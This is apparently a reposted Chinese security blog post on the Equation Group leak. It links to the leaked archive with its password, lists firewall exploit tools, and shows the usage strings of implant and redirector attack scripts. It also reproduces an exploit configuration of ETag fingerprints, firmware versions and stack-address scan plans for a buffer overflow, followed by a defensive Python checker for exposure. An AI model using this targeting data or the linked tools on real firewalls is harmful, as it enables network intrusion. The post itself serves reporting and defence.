Equation Group Hacked, Large Numbers of Exploits Leaked

The hacker scene is all about hacking each other. Recently, hackers claimed to have broken into the Equation Group and are auctioning off the stolen exploits. You could say the hacker world's nuclear arsenal has been thrown open~
Today I found that someone on Zhihu has already posted the download link; I attach the original here:
Archive download (extraction password: theequationgroup)
https://mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU

Later I found 猪哥's analysis, which is attached here:

Two archives were leaked; only the free-file archive can be opened, the other has no password for now (100 bitcoin):

$ ls -lah *.gpg
-rw-rw-r--@ 1 noname staff 128M 7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname staff 182M 7 25 10:50 eqgrp-free-file.tar.xz.gpg
The free-file archive mainly covers scanners targeting firewalls, exploitation frameworks, and so on:
  • BLATSTING -- brute-force enumeration
  • EXPLOITS -- exploit code
  • OPS -- attack operation control toolkit
  • SCRIPTS -- script resource library
  • TOOLS -- helper toolkit (encoding conversion, IP format conversion, encryption/decryption conversion, etc.)

By analyzing the file names of the corresponding attack payloads we can roughly guess which firewall versions are affected; for example, from the listing below, a Google search tells us that the Cisco ASA5505 firewall is affected.

# find /Firewall/BANANAGLEE/BG3000/
.//Install/SCP/asa5505_clean60000.bin
.//Install/SCP/asa5505_clean70000.bin
.//Install/SCP/asa5505_cleanE18BF.bin
.//Install/SCP/asa5505_cleanEC480.bin
.//Install/SCP/asa5505_patch60000.bin
.//Install/SCP/asa5505_patchE18BF.bin
.//Install/SCP/asa5505_patchEC480.bin
.//Install/SCP/asaGen_clean10000_biosVer114or115.bin
.//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Juniper NetScreen-ISG 2000 firewall

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x 23 noname staff 782B 8 16 12:35 .
drwxr-xr-x 3 noname staff 102B 4 10 2010 ..
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 BARPUNCH-3110
-rwxr-xr-x 1 noname staff 2.4M 6 11 2013 BICE-3110
drwxr-xr-x 6 noname staff 204B 4 10 2010 Modules
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x 1 noname staff 7.8K 6 11 2013 bg_redirect.pl-3110
-rwxr-xr-x 1 noname staff 431K 6 11 2013 bg_redirector-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 cfMiniProg-3110
-rwxr-xr-x 1 noname staff 1.1M 6 11 2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 996K 6 11 2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 385K 6 11 2013 keygen-3110
-rwxr-xr-x 1 noname staff 285K 10 18 2013 maclist
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 nsLogMiniProg-3110
-rwxr-xr-x 1 noname staff 413K 6 11 2013 pd_create_ruleset-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 pd_miniprog-3110
-rwxr-xr-x 1 noname staff 6.2K 6 11 2013 pd_start_pat.pl-3110
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 profilerIpv4-3100
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 13K 6 11 2013 start_redirector.pl-3110
-rwxr-xr-x 1 noname staff 42B 6 11 2013 stop_redirector.sh-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 tunWiz-3110

In the same directory is the exploit code (pl, sh) targeting this firewall; you can see the options carry the words attack_ip, draw your own conclusions

# perl pd_start_pat.pl-3110
Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file> [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --attack_ip <attack_ip> --intermediate_ip <intermediate_ip> --attack_int <interface> --target_int <interface> --port_offset <port offset> --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port> [--logdir <logdir>] [--help]

# perl start_redirector.pl-3110   // tunnel attack tool
Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file> [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip> --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip> --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port> --enc_iface <interface number> --clr_iface <interface number> --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>] [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>] [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>] [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>] [--help]

#################################
# ETags from actual hardware
#################################
# tested
ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1
ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1
ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1
# added Dec. 2009 - WOBBLYLLAMA
ETAG = 55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
# added Mar. 2010 - FLOCKFORWARD
ETAG = 6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1
# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1
# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1
#BLATSTING SUPPORT FOR ALL ABOVE
# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27
###################################################################
# BELOW IS FOR DEVELOPERS ONLY
###################################################################
# Etags and address from real hardware
#ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1
# ETags and addresses from milliways
#ETAG = e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1
###################################################################
# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
# SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses>
#Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
# buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
# one plan matches, they will be tried in the order they're listed in this file. If none match,
# the user will get an error to that effect.
# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0
# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180
# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180
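The ETAG entries above pair a device's HTTP ETag with a firmware build, and the SCANPLAN lines key their inclusive date windows on the ETag's third field. That makes the ETag a cheap inventory signal for the defending side: a firewall administrator can read the ETag their own device's web interface returns and check whether the build is an exact fingerprint in this list or merely falls inside one of the date windows. The Python below is an added example, not part of the original post or of the leaked tooling. It assumes Apache-style inode-size-mtime ETags whose third field is a Unix time in seconds (the page only says the field is a hex date), and the embedded config is a constructed excerpt with shortened address lists, since the check never uses the addresses.

```python
import re
from datetime import datetime, timezone

# Constructed sample (not the full leaked file): a few ETAG and SCANPLAN lines
# in the format shown on the page. Address lists are cut to two entries
# because this exposure check never uses them.
SAMPLE_CONFIG = """\
# tested
ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
# added Dec. 2009 - WOBBLYLLAMA
ETAG = 55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80
"""

ETAG_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)$")


def parse_etag(raw):
    """Split an Apache-style inode-size-mtime ETag into three ints.

    Assumption (not stated on the page): the third field is a Unix time in
    seconds, which is what the config's 'dates ... written as hex values just
    like the third etag field' comment implies."""
    value = raw.strip()
    if value.startswith("W/"):          # weak validator prefix, e.g. W/"e6-..."
        value = value[2:]
    value = value.strip('"')
    m = ETAG_RE.match(value)
    if not m:
        raise ValueError("not an inode-size-mtime ETag: %r" % raw)
    return tuple(int(field, 16) for field in m.groups())


def etag_date(raw):
    """Build date encoded in the ETag's mtime field, as an aware UTC datetime."""
    return datetime.fromtimestamp(parse_etag(raw)[2], tz=timezone.utc)


def load_fingerprints(text):
    """Parse ETAG and SCANPLAN lines. '#' comments and blank lines are skipped,
    so the commented-out developer entries on the page are ignored."""
    etags, plans = [], []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, rest = line.partition("=")   # only the first '=' separates key and value
        fields = [f.strip() for f in rest.split(":")]
        if key.strip() == "ETAG" and len(fields) == 4:
            etags.append({"etag": parse_etag(fields[0]), "path": fields[1],
                          "addr": fields[2], "version": fields[3]})
        elif key.strip() == "SCANPLAN" and len(fields) == 4:
            plans.append({"path": fields[0], "min": int(fields[1], 16),
                          "max": int(fields[2], 16),
                          "addresses": fields[3].split(",")})
    return etags, plans


def assess(raw_etag, config_text=SAMPLE_CONFIG):
    """Report whether a device's ETag is (a) an exact, tested fingerprint or
    (b) merely inside a SCANPLAN date window. Windows are INCLUSIVE, per the page."""
    etags, plans = load_fingerprints(config_text)
    fields = parse_etag(raw_etag)
    mtime = fields[2]
    return {
        "mtime_utc": etag_date(raw_etag).isoformat(),
        "exact": [e["version"] for e in etags if e["etag"] == fields],
        "windows": [p["path"] for p in plans if p["min"] <= mtime <= p["max"]],
    }


if __name__ == "__main__":
    # Two constructed ETag header values: one tested fingerprint, one unknown build.
    for sample in ('"e6-569-46b6b873"', 'W/"1234-5e7-48f00000"'):
        print(sample, assess(sample))
```

The exact match is the signal that matters: it says the build is one the tool was tested against. Because the later SCANPLAN windows run to 0xffffffff, any newer build still lands in a window, which only means the tool would have attempted it, not that the build is affected. Feeding every firewall's ETag through assess() from an inventory script gives a quick ordering of which devices to patch or take off the network first.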

Source: https://www.zhihu.com/question/49658687
When reposting, please include the link and credit 404 Security (404.so)